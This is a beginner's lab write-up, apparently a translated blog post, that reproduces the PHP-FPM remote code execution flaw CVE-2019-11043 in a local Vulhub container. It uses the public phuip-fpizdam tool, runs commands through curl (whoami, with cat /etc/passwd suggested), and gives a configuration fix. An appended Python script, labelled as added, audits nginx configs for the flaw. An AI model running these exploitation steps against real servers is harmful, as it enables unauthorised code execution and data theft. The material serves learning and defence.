Penetration Testing (Beginner) Series: Reproducing the PHP-FPM Remote Code Execution Vulnerability (CVE-2019-11043)

(This article is only a personal learning record. If there are any errors, please point them out; if it helps you, I am very happy.)

 

The reproduction in this article references material from the web and is for learning and exchange only; illegal use is strictly prohibited!!!

 

I. Introduction

CVE-2019-11043 is a remote code execution vulnerability in PHP-FPM. On an Nginx + PHP-FPM server with certain configurations, it could allow an attacker to execute code remotely: when a URL containing %0a is sent to the Nginx + PHP-FPM server, the server returns abnormally.

  • This vulnerability requires a specific configuration in nginx.conf in order to trigger; the configuration is as follows:
location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}
  • An attacker can use a line feed (%0a) to break the regular expression of the fastcgi_split_path_info directive; the broken regexp leaves PATH_INFO empty, which triggers the vulnerability.
  • Affected versions: PHP 5.6-7.x

(The introduction is from http://blog.leanote.com/post/snowming/9da184ef24bd, which explains it in great detail. Thanks!)

 

II. Vulnerability Reproduction Process

1. Preparing the Environment

  • Docker was installed in Kali before this reproduction; for the installation process, see https://www.cnblogs.com/yankaohaitaiwei/p/11788333.htm
  • The tool phuip-fpizdam needs to be installed in Kali (installing the tool in Kali makes testing easy; the attacker and the target machine are then the same Kali box. If you do not want the attacker and the target to be the same machine, install the tool on the attacker's host, and the attacker must be able to communicate with the target.)
    • Download phuip-fpizdam
git clone https://github.com/neex/phuip-fpizdam

    • Enter the downloaded phuip-fpizdam directory; you can see many .go files, which indicates that the tool needs a Go language environment.

    • Install the Go environment
go                      # check whether a Go environment is present; any output means it is
apt install golang-go   # install Go
go version              # view the Go version

    • Install phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam

2. Start Docker, enter the CVE-2019-11043 directory under Vulhub's php directory, and start the whole environment

/etc/init.d/docker start

cd vulhub-master/
cd php
cd CVE-2019-11043

docker-compose up -d

3. Check the port

docker ps  # list all running containers

4. Based on the output, visit the vulnerable site built with Vulhub from the host machine's browser

5. Back in Kali, start the phuip-fpizdam tool

cd go/bin
./phuip-fpizdam

6. Check whether the vulnerability exists

./phuip-fpizdam http://127.0.0.1:8080/index.php

  • The output shows that the vulnerability exists, and the way to exploit it is also given

7. Exploit the vulnerability; whoami can be replaced with other commands such as ls, cat /etc/passwd and so on, which are not demonstrated further here

  • Replacing it with the ifconfig command may not succeed, possibly because the Docker environment does not support ifconfig
curl "http://127.0.0.1:8080/index.php?a=whoami"
  • If one run does not succeed, try a few more times

 

III. Fix

1. View the running Docker containers

docker ps

2. Enter the container and search the Nginx configuration directory for fastcgi_split_path_info

docker exec -it b92dfa82075b /bin/bash
grep -Rin --color 'fastcgi_split_path_info' /etc/nginx/

3. Read the Nginx configuration file, find fastcgi_split_path_info (used for URL matching) and fastcgi_param PATH_INFO, and comment them out to complete the fix

cat /etc/nginx/conf.d/default.conf
curl "http://127.0.0.1:8080/index.php?=cat /etc/nginx/conf.d/default.conf"  # read the config through the vulnerability
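As an added example (not part of the original article or of phuip-fpizdam), here is a small Python audit that flags the vulnerable location pattern from the introduction and accepts both the fix above (directives commented out) and a block guarded with `try_files ... =404`, the other commonly documented mitigation; the sample configs are constructed from the block quoted in the article.

```python
import re

# Constructed samples: the vulnerable block quoted in the article, the article's
# fix (both directives commented out) and, for contrast, a block with a
# file-existence guard (try_files ... =404), a mitigation the article does not use.
VULNERABLE_CONF = r"""
location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass   php:9000;
}
"""
FIXED_CONF = r"""
location ~ [^/]\.php(/|$) {
    # fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    # fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass   php:9000;
}
"""
GUARDED_CONF = VULNERABLE_CONF.replace(
    "fastcgi_pass", "try_files $fastcgi_script_name =404;\n    fastcgi_pass")

LOCATION_RE = re.compile(r"location\s+[^{]*\{")
PATH_INFO_RE = re.compile(r"fastcgi_param\s+PATH_INFO\s+\$fastcgi_path_info")
GUARD_RE = re.compile(r"try_files\b[^;]*=404|if\s*\(\s*!-f\b")

def location_blocks(conf):
    """Yield (header, body) for each `location ... { ... }` block, comments removed."""
    conf = re.sub(r"#[^\n]*", "", conf)  # nginx comments run from '#' to end of line
    for m in LOCATION_RE.finditer(conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:  # walk to the matching closing brace
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield m.group(0).strip(), conf[m.end():i - 1]

def audit(conf):
    """One finding per block that splits PATH_INFO for PHP with no existence check."""
    findings = []
    for header, body in location_blocks(conf):
        if ("fastcgi_split_path_info" in body and PATH_INFO_RE.search(body)
                and not GUARD_RE.search(body)):
            findings.append(f"{header} forwards unchecked PATH_INFO to PHP-FPM")
    return findings

if __name__ == "__main__":
    for name, conf in [("vulnerable", VULNERABLE_CONF), ("fixed", FIXED_CONF),
                       ("guarded", GUARDED_CONF)]:
        print(name, audit(conf) or "no finding")
```

Run it against the output of `cat /etc/nginx/conf.d/default.conf` from the container to confirm that the commented-out block is no longer reported.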

 

Origin www.cnblogs.com/yankaohaitaiwei/p/11795972.html